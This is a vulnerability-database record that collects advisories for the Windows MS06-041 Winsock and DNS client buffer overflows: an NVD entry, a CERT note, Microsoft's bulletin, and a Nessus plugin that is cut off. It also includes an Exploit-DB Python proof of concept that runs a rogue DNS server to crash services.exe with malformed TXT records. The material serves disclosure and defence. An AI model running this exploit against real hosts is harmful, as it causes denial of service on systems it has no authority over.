{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka \"Winsock Hostname Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2006-08-09T01:04:00", "title": "CVE-2006-3440", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3440"], "modified": "2018-10-12T21:40:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_2003_server:64-bit", "cpe:/o:microsoft:windows_2003_server:sp1", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2006-3440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3440", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:sp1:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:64-bit:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*"]}], "cert": [{"lastseen": "2020-09-18T20:43:12", "bulletinFamily": "info", "cvelist": ["CVE-2006-3440"], "description": "### Overview \n\nA buffer overflow vulnerability in Microsoft Winsock may allow a remote attacker to execute arbitrary code on an affected 
system.\n\n### Description \n\nWinsock (Windows Socket 2) allows network applications to relay data across a network regardless of the network protocol being used. Microsoft's Winsock contains a buffer overflow vulnerability that can allow a remote attacker to execute arbitrary code and gain control of the affected system. Exploitation of this vulnerability occurs when the remote attacker can convince the user to open a specially crafted file or website.\n\nMicrosoft's bulletin states that the following Windows operating systems are affected by this vulnerability: \n\n\n * Microsoft Windows 2000 Service Pack 4\n * Microsoft Windows XP Service Pack 1 and Service Pack 2\n * Microsoft Windows XP Professional x64 Edition\n * Microsoft Windows Server 2003 and Service Pack 1\n * Microsoft Windows Server 2003 for Itanium-based Systems and Service Pack 1\n * Microsoft Windows Server 2003 x64 Edition \n--- \n \n### Impact \n\nA remote attacker who can successfully convince a user to open a specially crafted file or website may be able to execute arbitrary code and gain control of the affected system. \n \n--- \n \n### Solution \n\n**Apply an update** \nMicrosoft has released updates in Microsoft Security Bulletin[ MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) to address this issue. \n \n \n--- \n \n**Workaround** \n \nMicrosoft lists the following workaround for this vulnerability. \n \n**Modify the Autodial DLL** \n \nModifying the Autodial DLL in the Windows registry will prevent specially crafted files and websites from invoking the affected API. \n \nPlease see the [Microsoft Security Bulletin MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) for further details and cautions regarding use of the Registry Editor. \n\n\n 1. Click **Start**, click **Run**, and type **regedit32**, click **OK**\n 2. 
Locate the following key within the Registry Editor: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Winsock2\\Parameters\n 3. Double click the REG_SZ value **AutoDialDLL**\n 4. Set the value to **kernel32.dll**\n 5. Close the Registry Editor and reboot the system\n \n* Note that this workaround does NOT fix the underlying vulnerability but will help block known methods of attack. \n--- \n \n### Vendor Information\n\n908276\n\n### Microsoft Corporation: Affected\n\nUpdated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft Corporation has published Microsoft Security Bulletin [MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) in response to this issue. Users are encouraged to review this bulletin and apply the referenced patches.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23908276 Feedback>).\n\n### References \n\n<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>\n\n### Acknowledgements\n\nThanks to Microsoft Security for reporting this vulnerability in Microsoft Security Bulletin MS06-041. Microsoft, in turn, thanks Peter Winter Smith of NGS Software for reporting the vulnerability to them. 
\n\nThis document was written by Katie Washok.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3440](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3440>) \n---|--- \n**Severity Metric:** | 12.83 \n**Date Public:** | 2006-08-08 \n**Date First Published:** | 2006-08-08 \n**Date Last Updated: ** | 2006-08-08 21:09 UTC \n**Document Revision: ** | 28 \n", "modified": "2006-08-08T21:09:00", "published": "2006-08-08T00:00:00", "id": "VU:908276", "href": "https://www.kb.cert.org/vuls/id/908276", "type": "cert", "title": "Microsoft Winsock buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T17:16:46", "description": "MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041). CVE-2006-3440,CVE-2006-3441. Dos exploit for windows platform", "published": "2006-12-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - DNS Resolution - Remote Denial of Service PoC MS06-041", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "modified": "2006-12-09T00:00:00", "id": "EDB-ID:2900", "href": "https://www.exploit-db.com/exploits/2900/", "sourceData": "#!/usr/bin/python\r\n#POC for MS06-041\r\n#Run the python script passing the local ip address as parameter. The DNS server\r\n#will start listening on this ip address for DNS hostname resolution queries.\r\n#This script is for testing and educational purpose and so to test this one will\r\n#have to point the DNS resolver on the target/client to the ip address on which\r\n#this script runs.\r\n#Open up internet explorer and type in a hostname. services.exe will crash.\r\n#You may have to repeat this two or three times to see the crash in services.exe\r\n# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not\r\n# reproduce on SP4 though it is also vulnerable. May be I missed something :)\r\n#\r\n# For testing/educational purpose. 
Author shall bear no responsibility for any screw ups\r\n# Winny Thomas ;-)\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\n\r\nclass DNSserver:\r\n def __init__(self, localhost):\r\n self.response = ''\r\n self.__create_socket(localhost)\r\n\r\n def __create_socket(self, localhost):\r\n self.host = localhost\r\n self.port = 53\r\n self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.DNSsocket.bind((self.host, self.port))\r\n print 'Awaiting DNS queries'\r\n print '====================\\n'\r\n while 1:\r\n self.__await_query()\r\n\r\n def __await_query(self):\r\n self.Query, self.Addr = self.DNSsocket.recvfrom(1024)\r\n print 'Query from: ' + str(self.Addr)\r\n self.TransactID = self.Query[0:2]\r\n self.__find_type(self.Query[2:])\r\n\r\n def __find_type(self, Question):\r\n qType = struct.unpack('>H', Question[0:2])\r\n if qType[0] == 256:\r\n self.__send_response(Question[10:-4])\r\n\r\n def __send_response(self, sName):\r\n self.response = self.TransactID\r\n self.response += '\\x85\\x80' #Flags\r\n self.response += '\\x00\\x01' #Questions\r\n self.response += '\\x00\\x02' #Answer RR's\r\n self.response += '\\x00\\x01' #Authority RR\r\n self.response += '\\x00\\x00' #Additional RR\r\n\r\n #QUERIES\r\n #self.response += sName\r\n self.response += '\\x04\\x74\\x65\\x73\\x74\\x07\\x68\\x61\\x63\\x6b\\x65'\r\n self.response += '\\x72\\x73\\x03\\x63\\x6f\\x6d\\x00'\r\n self.response += '\\x00\\xff' #request all records\r\n self.response += '\\x00\\x01' #inet class\r\n\r\n #ANSWERS\r\n #A record\r\n self.response += '\\xc0\\x0c\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x07'\r\n self.response += '\\x00\\x04\\xc0\\xa8\\x00\\x02' #A type record (IP add)\r\n #TXT record\r\n self.response += '\\xc0\\x0c\\x00\\x10\\x00\\x01\\x00\\x00\\x00\\x07'\r\n self.response += '\\x00\\x18' #TXT record length\r\n self.response += '\\x08\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c'\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x00' #Zero 
length TXT RDATA\r\n self.response += '\\x08\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c'\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x01\\x41'\r\n\r\n #Authoritative Nameservers\r\n self.response += '\\xc0\\x11\\x00\\x02\\x00\\x01\\x00\\x01\\x51\\x80'\r\n self.response += '\\x00\\x0b\\x08\\x73\\x63\\x6f\\x72\\x70\\x69\\x6f'\r\n self.response += '\\x6e\\xc0\\x11'\r\n\r\n self.DNSsocket.sendto(self.response, (self.Addr))\r\n\r\nif __name__ == '__main__':\r\n try:\r\n localhost = sys.argv[1]\r\n except IndexError:\r\n print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]\r\n sys.exit(-1)\r\n\r\n D = DNSserver(localhost)\r\n\r\n# milw0rm.com [2006-12-09]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2900/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "description": "Microsoft Security Bulletin MS06-041\r\nVulnerability in DNS Resolution Could Allow Remote Code Execution (920683)\r\nPublished: August 8, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft 
Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves several newly discovered, privately reported, vulnerabilities.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWe recommend that customers apply this update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nWinsock Hostname Vulnerability - CVE-2006-3440\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nDNS Client Buffer Overrun Vulnerability - CVE-2006-3441\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition 
severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update addresses several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. 
It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nFor more information, visit the Windows Operating System FAQ.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. 
For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nWinsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nThere is a remote code execution vulnerability in Winsock that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system. 
For an attack to be successful the attacker would have to force the user to open a file or visit a website that is specially crafted to call the affected Winsock API.\r\n\t\r\nMitigating Factors for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who persuaded a user to open a specially crafted file or view a specially crafted website. There is no way for an attacker to force a user to open a specially crafted file, except potentially through previewing an e-mail message.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nModify the Autodial DLL\r\n\r\nModifying the Autodial DLL within the Windows registry will prevent an application, specially crafted website or e-mail message from calling the affected API and exploiting the vulnerability. If the Autodial DLL registry value is not found by default in the specified location we recommend that customers create the REG_SZ value accordingly.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. 
For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\nNote We recommend backing up the registry before you edit\r\n\u2022\t\r\n\r\nClick Start, click Run, type "regedt32 " (without the quotation marks), and then click OK\r\n\u2022\t\r\n\r\nIn Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\r\n\u2022\t\r\n\r\nDouble click the REG_SZ value AutodialDLL\r\n\u2022\t\r\n\r\nSet the data value to kernel32.dll\r\n\u2022\t\r\n\r\nClose the regedt32 utility and reboot\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Winsock API.\r\n\r\nWhat is Winsock?\r\nWindows Sockets 2 (Winsock) enables programmers to create advanced Internet, intranet, and other network-capable applications to transmit application data across the wire, independent of the network protocol being used. With Winsock, programmers are provided access to advanced Microsoft\u00ae Windows\u00ae networking capabilities such as multicast and Quality of Service (QOS). 
For more information about Winsock, please see the following MSDN Article.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nThe vulnerability could be exploited by an attacker who persuaded a user to open a specially crafted file or view a specially crafted website. There is no way for an attacker to force a user to open a specially crafted file, except potentially through previewing an e-mail message. Additionally, if an application uses the affected API it is possible that it could be exploited during regular usage scenarios that may not require user action.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nServers and workstations are primarily at risk from this vulnerability.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected function validates the message before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nDNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nThere is a remote code execution vulnerability in the DNS Client service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.\r\n\t\r\nMitigating Factors DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\u2022\t\r\n\r\nFor an attack to be successful the attacker would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nFor an attack to be successful the attackers would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\n\u2022\t\r\n\r\nBlock DNS related records at network gateways\r\n\r\nBlocking the following DNS record types at network gateways will help protect the affected system from attempts to exploit this vulnerability.\r\n\u2022\t\r\n\r\nATMA\r\n\u2022\t\r\n\r\nTXT\r\n\u2022\t\r\n\r\nX25\r\n\u2022\t\r\n\r\nHINFO\r\n\u2022\t\r\n\r\nISDN DNS\r\nTop of sectionTop of section\r\n\t\r\nFAQ DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the DNS client layer.\r\n\r\nWhat is DNS?\r\nThe Domain Name System (DNS) client service resolves and caches DNS names. The DNS client service must be running on every computer that will perform DNS name resolution. The ability to resolve DNS names is crucial for locating domain controllers in Active Directory domains. The DNS client service is also critical for locating devices identified using DNS name resolution. 
For more information on the DNS client service please see the following Microsoft TechNet Article.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn anonymous user could exploit the vulnerability by sending a specially crafted DNS communication to an affected client. For an attack to be successful the attacker would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nServers and workstations are primarily at risk from this vulnerability.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by validating the way that the DNS client handles DNS related communications.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nAn attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by validating the way that the DNS client handles DNS related communications.\r\n\r\nWould disabling the DNS client service or configuring the client to use a specific DNS server mitigate the vulnerability?\r\nNo. The vulnerability cannot be mitigated by disabling the DNS client service or configuring the use of a specific trusted DNS server.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. 
Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nPeter Winter Smith of NGS Software for reporting the Winsock Hostname Vulnerability - (CVE-2006-3440).\r\n\u2022\t\r\n\r\nMark Dowd of ISS X-Force for reporting the DNS Client Buffer Overrun Vulnerability - (CVE-2006-3441).\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (August 8, 2006): Bulletin published.", "edition": 1, "modified": "2006-08-08T00:00:00", "published": "2006-08-08T00:00:00", "id": "SECURITYVULNS:DOC:13790", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13790", "title": "Microsoft Security Bulletin MS06-041 Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T06:15:35", "description": "The remote host is vulnerable to a buffer overrun in the DNS client\nservice that could allow an attacker to execute arbitrary code on the\nremote host with SYSTEM privileges.\n\nTo exploit this vulnerability, an attacker would need to set up a\nrogue DNS server to reply to the client with a specially crafted\npacket.", "edition": 29, "published": "2006-08-08T00:00:00", "title": "MS06-041: Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-041.NASL", "href": "https://www.tenable.com/plugins/nessus/22183", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22183);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-3440\", \"CVE-2006-3441\");\n script_bugtraq_id(19319, 19404);\n script_xref(name:\"CERT\", value:\"908276\");\n script_xref(name:\"CERT\", value:\"794580\");\n script_xref(name:\"MSFT\", value:\"MS06-041\");\n script_xref(name:\"MSKB\", value:\"920683\");\n\n script_name(english:\"MS06-041: Vulnerability in 
DNS Resolution Could Allow Remote Code Execution (920683)\");\n script_summary(english:\"Determines the presence of update 920683\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nDNS client.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the DNS client\nservice that could allow an attacker to execute arbitrary code on the\nremote host with SYSTEM privileges.\n\nTo exploit this vulnerability, an attacker would need to set up a\nrogue DNS server to reply to the client with a specially crafted\npacket.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-041\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n 